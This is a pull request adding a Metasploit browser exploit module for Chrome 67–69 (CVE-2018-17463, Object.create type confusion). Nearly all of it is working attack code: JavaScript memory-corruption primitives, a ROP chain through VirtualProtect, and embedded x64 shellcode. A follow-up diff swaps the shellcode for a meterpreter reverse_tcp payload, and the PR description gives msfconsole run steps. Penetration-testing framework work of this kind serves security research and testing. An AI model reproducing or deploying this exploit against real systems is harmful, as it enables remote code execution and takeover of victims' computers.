 </html>
     ^
+    unless datastore['DEBUG_EXPLOIT']
+      html.gsub!(/\/\/.*$/, '') # strip comments
+      html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
+    end
     send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
   end
 

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -1,0 +1,346 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome 67, 68 and 69 Object.create exploit',
+      'Description'    => %q{
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'saelo', # discovery and exploit
+          'timwr', # metasploit module
+        ],
+      'References'     => [
+          ['CVE', '2018-17463'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'Platform'       => 'windows',
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' },
+      'Targets'        => [ [ 'Automatic', { } ] ],
+      'DisclosureDate' => 'Sep 25 2018'))
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    html = %Q^
+<!DOCTYPE html>
+<html>
+    <head>
+        <script>
+        log = console.log;
+        print = alert;
+
+        // We need some space later
+        let scratch = new ArrayBuffer(0x100000);
+        let scratch_u8 = new Uint8Array(scratch);
+        let scratch_u64 = new BigUint64Array(scratch);
+        scratch_u8.fill(0x41, 0, 10);
+
+        let shellcode = new Uint8Array([
+  0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
+  0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
+  0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
+  0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
+  0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
+  0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
+  0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
+  0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
+  0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
+  0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
+  0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
+  0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
+  0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
+  0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
+  0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
+  0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
+  0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
+  0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
+  0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
+  0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
+  0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
+  0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
+  0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
+        ]);
+
+        let ab = new ArrayBuffer(8);
+        let floatView = new Float64Array(ab);
+        let uint64View = new BigUint64Array(ab);
+        let uint8View = new Uint8Array(ab);
+
+        Number.prototype.toBigInt = function toBigInt() {
+            floatView[0] = this;
+            return uint64View[0];
+        };
+
+        BigInt.prototype.toNumber = function toNumber() {
+            uint64View[0] = this;
+            return floatView[0];
+        };
+
+        function hex(n) {
+            return '0x' + n.toString(16);
+        };
+
+        function fail(s) {
+            print('FAIL ' + s);
+            throw null;
+        }
+
+        const NUM_PROPERTIES = 32;
+        const MAX_ITERATIONS = 100000;
+
+        function gc() {
+            for (let i = 0; i < 200; i++) {
+                new ArrayBuffer(0x100000);
+            }
+        }
+
+        function make(properties) {
+            let o = {inline: 42}      // TODO
+            for (let i = 0; i < NUM_PROPERTIES; i++) {
+                eval(`o.p${i} = properties[${i}];`);
+            }
+            return o;
+        }
+
+        function pwn() {
+            function find_overlapping_properties() {
+                let propertyNames = [];
+                for (let i = 0; i < NUM_PROPERTIES; i++) {
+                    propertyNames[i] = `p${i}`;
+                }
+                eval(`
+                    function vuln(o) {
+                        let a = o.inline;
+                        this.Object.create(o);
+                        ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\n')}
+                        return [${propertyNames.join(', ')}];
+                    }
+                `);
+
+                let propertyValues = [];
+                for (let i = 1; i < NUM_PROPERTIES; i++) {
+                    propertyValues[i] = -i;
+                }
+
+                for (let i = 0; i < MAX_ITERATIONS; i++) {
+                    let r = vuln(make(propertyValues));
+                    if (r[1] !== -1) {
+                        for (let i = 1; i < r.length; i++) {
+                            if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
+                                return [i, -r[i]];
+                            }
+                        }
+                    }
+                }
+
+                fail("Failed to find overlapping properties");
+            }
+
+            function addrof(obj) {
+                eval(`
+                    function vuln(o) {
+                        let a = o.inline;
+                        this.Object.create(o);
+                        return o.p${p1}.x1;
+                    }
+                `);
+
+                let propertyValues = [];
+                propertyValues[p1] = {x1: 13.37, x2: 13.38};
+                propertyValues[p2] = {y1: obj};
+
+                let i = 0;
+                for (; i < MAX_ITERATIONS; i++) {
+                    let res = vuln(make(propertyValues));
+                    if (res !== 13.37)
+                        return res.toBigInt()
+                }
+
+                fail("Addrof failed");
+            }
+
+            function corrupt_arraybuffer(victim, newValue) {
+                eval(`
+                    function vuln(o) {
+                        let a = o.inline;
+                        this.Object.create(o);
+                        let orig = o.p${p1}.x2;
+                        o.p${p1}.x2 = ${newValue.toNumber()};
+                        return orig;
+                    }
+                `);
+
+                let propertyValues = [];
+                let o = {x1: 13.37, x2: 13.38};
+                propertyValues[p1] = o;
+                propertyValues[p2] = victim;
+
+                for (let i = 0; i < MAX_ITERATIONS; i++) {
+                    o.x2 = 13.38;
+                    let r = vuln(make(propertyValues));
+                    if (r !== 13.38)
+                        return r.toBigInt();
+                }
+
+                fail("Corrupt ArrayBuffer failed");
+            }
+
+            let [p1, p2] = find_overlapping_properties();
+            log(`[+] Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);
+
+            let memview_buf = new ArrayBuffer(1024);
+            let driver_buf = new ArrayBuffer(1024);
+
+            gc();
+
+
+            let memview_buf_addr = addrof(memview_buf);
+            memview_buf_addr--;
+            log(`[+] ArrayBuffer @ ${hex(memview_buf_addr)}`);
+
+            let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);
+
+            let driver = new BigUint64Array(driver_buf);
+            let original_memview_buf_ptr = driver[4];
+
+            let memory = {
+                write(addr, bytes) {
+                    driver[4] = addr;
+                    let memview = new Uint8Array(memview_buf);
+                    memview.set(bytes);
+                },
+                read(addr, len) {
+                    driver[4] = addr;
+                    let memview = new Uint8Array(memview_buf);
+                    return memview.subarray(0, len);
+                },
+                readPtr(addr) {
+                    driver[4] = addr;
+                    let memview = new BigUint64Array(memview_buf);
+                    return memview[0];
+                },
+                writePtr(addr, ptr) {
+                    driver[4] = addr;
+                    let memview = new BigUint64Array(memview_buf);
+                    memview[0] = ptr;
+                },
+                addrof(obj) {
+                    memview_buf.leakMe = obj;
+                    let props = this.readPtr(memview_buf_addr + 8n);
+                    return this.readPtr(props + 15n) - 1n;
+                },
+            };
+
+            let div = document.createElement('div');
+            let div_addr = memory.addrof(div);
+            alert('div_addr = ' + hex(div_addr));
+            let el_addr = memory.readPtr(div_addr + 0x20n);
+            let leak = memory.readPtr(el_addr);
+
+            let chrome_child = leak - 0x40b5f20n;
+            print('chrome_child @ ' + hex(chrome_child));
+            // CreateEventW
+            //let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20750n;
+            //let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9a9a0n;
+            let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20d10n;
+            print('kernel32 @ ' + hex(kernel32));
+            log('ntqueryevent import @ ' + hex(kernel32 + 0x78208n));
+            log('ntqueryevent export @ ' + hex(memory.readPtr(kernel32 + 0x78208n)));
+            // kernel32 00007FFF5D9A0000 NtQueryEvent import 00007FFF5DA18208
+            // ntdll    00007FFF5FE40000 NtQueryEvent export 00007FFF5FEDB450
+            let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9b450n;
+            print('ntdll @ ' + hex(ntdll));
+
+            let virtualprotect = kernel32 + 0x1ACB0n;
+            //kernel32 + 0x193d0n, // VirtualProtect
+            print('virtualprotect @ ' + hex(virtualprotect));
+
+            /*
+            00007ff9`296f0705 488b5150        mov     rdx,qword ptr [rcx+50h]
+            00007ff9`296f0709 488b6918        mov     rbp,qword ptr [rcx+18h]
+            00007ff9`296f070d 488b6110        mov     rsp,qword ptr [rcx+10h]
+            00007ff9`296f0711 ffe2            jmp     rdx
+
+            0x1800a11b5      488b5150       mov rdx, qword [rcx + 0x50]
+            00007FFF5FEE11B5 488B5150
+            */
+
+            let gadget = ntdll + 0xa11b5n;
+            //let gadget = ntdll + 0xA0705n;
+            //let gadget = 0x41414141n;
+            log('gadget @ ' + hex(gadget));
+
+            let pop_gadgets = [
+                chrome_child + 0x36a657n, // pop rcx ; ret     59 c3
+                chrome_child + 0x9962n, // pop rdx ; ret       5a c3
+                chrome_child + 0xc72852n, // pop r8 ; ret      41 58 c3
+                chrome_child + 0xc51425n, // pop r9 ; ret      41 59 c3
+            ];
+
+            let scratch_addr = memory.readPtr(memory.addrof(scratch) + 0x20n);
+
+            let sc_offset = 0x20000n - scratch_addr % 0x1000n;
+            let sc_addr = scratch_addr + sc_offset
+            scratch_u8.set(shellcode, Number(sc_offset));
+
+            scratch_u64.fill(gadget, 0, 100);
+            //scratch_u64.fill(0xdeadbeefn, 0, 100);
+
+            let fake_vtab = scratch_addr;
+            let fake_stack = scratch_addr + 0x10000n;
+
+            let stack = [
+                pop_gadgets[0],
+                sc_addr,
+                pop_gadgets[1],
+                0x1000n,
+                pop_gadgets[2],
+                0x40n,
+                pop_gadgets[3],
+                scratch_addr,
+                virtualprotect,
+                sc_addr,
+            ];
+
+            for (let i = 0; i < stack.length; ++i) {
+                scratch_u64[0x10000/8 + i] = stack[i];
+            }
+
+            memory.writePtr(el_addr + 0x10n, fake_stack); // RSP
+            memory.writePtr(el_addr + 0x50n, pop_gadgets[0] + 1n); // RIP = ret
+            memory.writePtr(el_addr + 0x58n, 0n);
+            memory.writePtr(el_addr + 0x60n, 0n);
+            memory.writePtr(el_addr + 0x68n, 0n);
+            memory.writePtr(el_addr, fake_vtab);
+
+            // Trigger virtual call
+            div.dispatchEvent(new Event('click'));
+
+            // We are done here, repair the corrupted array buffers
+            let addr = memory.addrof(driver_buf);
+            memory.writePtr(addr + 32n, original_driver_buf_ptr);
+            memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);
+        }
+
+        alert("Press OK to pwn");
+        pwn();
+        </script>
+    </head>
+    <body>
+    </body>
+</html>
+    ^
+    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+  end
+
+end

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -32,11 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
     html = %Q^
-<!DOCTYPE html>
 <html>
     <head>
         <script>
-        log = console.log;
+        log = alert;
         print = alert;
 
         // We need some space later
@@ -45,31 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         let scratch_u64 = new BigUint64Array(scratch);
         scratch_u8.fill(0x41, 0, 10);
 
-        let shellcode = new Uint8Array([
-  0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
-  0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
-  0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
-  0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
-  0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
-  0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
-  0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
-  0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
-  0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
-  0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
-  0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
-  0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
-  0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
-  0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
-  0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
-  0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
-  0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
-  0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
-  0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
-  0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
-  0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
-  0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
-  0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
-        ]);
+        let shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);
 
         let ab = new ArrayBuffer(8);
         let floatView = new Float64Array(ab);
@@ -247,22 +222,38 @@ class MetasploitModule < Msf::Exploit::Remote
             let el_addr = memory.readPtr(div_addr + 0x20n);
             let leak = memory.readPtr(el_addr);
 
-            let chrome_child = leak - 0x40b5f20n;
+            print('leak @ ' + hex(leak));
+            let chrome_child = (leak - 0x40b4500n) & 0x7ffffff0000n;
+
             print('chrome_child @ ' + hex(chrome_child));
+            log('createeventw @ ' + hex(chrome_child + 0x4770260n));
+            log('createeventw = ' + hex(memory.readPtr(chrome_child + 0x4770260n)));
+
             // CreateEventW
             //let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20750n;
-            //let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9a9a0n;
-            let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20d10n;
+            //let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20d10n;
+            let kernel32 = memory.readPtr(chrome_child + 0x4770260n) - 0x15290n;
+
             print('kernel32 @ ' + hex(kernel32));
-            log('ntqueryevent import @ ' + hex(kernel32 + 0x78208n));
-            log('ntqueryevent export @ ' + hex(memory.readPtr(kernel32 + 0x78208n)));
+            //log('ntqueryevent import @ ' + hex(kernel32 + 0x78208n));
+            //log('ntqueryevent export @ ' + hex(memory.readPtr(kernel32 + 0x78208n)));
             // kernel32 00007FFF5D9A0000 NtQueryEvent import 00007FFF5DA18208
             // ntdll    00007FFF5FE40000 NtQueryEvent export 00007FFF5FEDB450
-            let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9b450n;
+
+            //log('ntqueryevent import @ ' + hex(kernel32 + 0x9c478n));
+            //log('ntqueryevent export @ ' + hex(memory.readPtr(kernel32 + 0x9c478n)));
+            // kernel32 0000000076E10000 0000000076EAC478
+            // ntdll 0x76F30000 0x76f81870
+
+            //let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9a9a0n;
+            //let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9b450n;
+            let ntdll = memory.readPtr(kernel32 + 0x9c478n) - 0x51870n;
+
             print('ntdll @ ' + hex(ntdll));
 
-            let virtualprotect = kernel32 + 0x1ACB0n;
             //kernel32 + 0x193d0n, // VirtualProtect
+            //let virtualprotect = kernel32 + 0x1ACB0n;
+            let virtualprotect = kernel32 + 0x2ef0n;
             print('virtualprotect @ ' + hex(virtualprotect));
 
             /*
@@ -273,19 +264,37 @@ class MetasploitModule < Msf::Exploit::Remote
 
             0x1800a11b5      488b5150       mov rdx, qword [rcx + 0x50]
             00007FFF5FEE11B5 488B5150
+
+            0x78ea1045      488b5150       mov rdx, qword [rcx + 0x50]
             */
 
-            let gadget = ntdll + 0xa11b5n;
-            //let gadget = ntdll + 0xA0705n;
             //let gadget = 0x41414141n;
-            log('gadget @ ' + hex(gadget));
+            //let gadget = ntdll + 0xA0705n;
+            //let gadget = ntdll + 0xa11b5n;
+            let gadget = ntdll + 0x51045n;
+
+//    chrome_child + 0x36a657n, // pop rcx ; ret     59 c3
+//0x000000018007522f: pop rcx; ret;
 
             let pop_gadgets = [
-                chrome_child + 0x36a657n, // pop rcx ; ret     59 c3
-                chrome_child + 0x9962n, // pop rdx ; ret       5a c3
-                chrome_child + 0xc72852n, // pop r8 ; ret      41 58 c3
-                chrome_child + 0xc51425n, // pop r9 ; ret      41 59 c3
+                chrome_child + 0x7522fn,   // pop rcx ; ret     59 c3
+                chrome_child + 0x9962n,    // pop rdx ; ret     5a c3
+                chrome_child + 0xc72852n,  // pop r8 ; ret      41 58 c3
+                chrome_child + 0xc51425n,  // pop r9 ; ret      41 59 c3
             ];
+
+            /*
+            log('gadget @ ' + hex(gadget));
+            log('gadget = ' + hex(memory.readPtr(gadget) & 0xffffffffn));
+            log('pop_gadget @ ' + hex(pop_gadgets[0]));
+            log('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[0]) & 0xffffn));
+            log('pop_gadget @ ' + hex(pop_gadgets[1]));
+            log('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[1]) & 0xffffn));
+            log('pop_gadget @ ' + hex(pop_gadgets[2]));
+            log('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[2]) & 0xffffffn));
+            log('pop_gadget @ ' + hex(pop_gadgets[3]));
+            log('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[3]) & 0xffffffn));
+            */
 
             let scratch_addr = memory.readPtr(memory.addrof(scratch) + 0x20n);
 


### PR DESCRIPTION
Initial commit of a Chrome exploit for 67, 68 and 69 by @saelo 
Currently there is no sandbox escape, so you'll need to run Chrome with --no-sandbox.
I've removed the hard-coded offsets so it should work on any vulnerable Chrome / Windows combination but I've only tested on Windows 7 and Windows 10 with Chrome 69.0.3497.100.
Additionally the meterpreter session dies (PrependMigrate fixes this on Win7, but not Win10), but I'm not too bothered about this as the payload will likely be replaced with a sandbox escape.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Run the exploit:
```
use exploit/multi/browser/chrome_object_create
set SRVHOST 192.168.56.1
set URIPATH /
set LHOST 192.168.56.1
set DEBUG_EXPLOIT true
set PAYLOAD windows/x64/exec
set CMD calc.exe
run
```
- [ ] **Verify** calc pops up

